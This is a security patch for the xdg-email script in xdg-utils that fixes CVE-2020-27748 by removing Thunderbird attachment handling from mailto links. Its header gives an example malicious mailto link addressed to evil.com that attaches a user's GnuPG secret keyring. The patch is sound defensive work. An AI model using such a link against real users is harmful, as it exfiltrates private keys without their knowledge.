This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg

See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177

CVE: CVE-2020-27748

--- scripts/xdg-email.in.orig	2024-02-06 01:55:07 UTC
+++ scripts/xdg-email.in
@@ -32,9 +32,9 @@ _USAGE
 
 run_thunderbird()
 {
-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
+    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
     THUNDERBIRD="$1"
-    MAILTO="$(echo "$2" | sed 's/^mailto://')"
+    MAILTO="$(echo "$2" | tr '&' '\n')"
     echo "$MAILTO" | grep -qs "^?"
     if [ "$?" = "0" ] ; then
         MAILTO="$(echo "$MAILTO" | sed 's/^?//')"
@@ -48,7 +48,6 @@ run_thunderbird()
     BCC="$(/bin/echo -e "$(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')")"
     SUBJECT="$(echo "$MAILTO" | grep '^subject=' | tail -n 1)"
     BODY="$(echo "$MAILTO" | grep '^body=' | tail -n 1)"
-    ATTACH="$(/bin/echo -e "$(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')")"
 
     if [ -z "$TO" ] ; then
         NEWMAILTO=
@@ -68,10 +67,6 @@ run_thunderbird()
         NEWMAILTO="${NEWMAILTO},$BODY"
     fi
 
-    if [ -n "$ATTACH" ] ; then
-        NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
-    fi
-
     NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
     DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
     "$THUNDERBIRD" -compose "$NEWMAILTO"
@@ -317,7 +312,7 @@ LC_ALL="$ORIG_LC_ALL"
 
 options=
 mailto=
-utf8="iconv -t utf8"
+utf8="iconv -t UTF-8"
 while [ $# -gt 0 ] ; do
     parm="$1"
     shift
